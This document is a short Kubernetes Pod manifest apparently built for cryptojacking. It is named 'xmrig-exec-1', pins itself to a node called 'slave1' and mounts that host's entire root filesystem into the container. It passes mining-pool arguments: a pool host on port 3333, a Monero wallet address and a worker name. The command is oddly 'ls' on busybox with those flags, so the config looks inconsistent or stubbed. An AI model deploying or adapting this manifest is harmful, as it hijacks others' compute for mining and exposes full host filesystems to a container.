apiVersion: v1
kind: Pod
metadata:
  name: xmrig-exec-1
spec:
  affinity:
    nodeAffinity:
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: kubernetes.io/hostname
            operator: In
            values:
            - slave1
  containers:
  - name: xmrig-container-1
    image: busybox
    command:
    - ls
    - -o
    - node.hacknoob.win:3333
    - -u
    - 46DWjxWviwCVHbYHaMxjusjGKm55LJmG6f3YTCJDmTf2RxCLfQRx22fSRELvwq36kY6iSGD5tiUsSQ4AsE8UFnWFBDd1Lzn
    - -p
    - slave1
    volumeMounts:
    - name: xmrig-volume-1
      mountPath: /
  volumes:
  - name: xmrig-volume-1
    hostPath:
      path: /
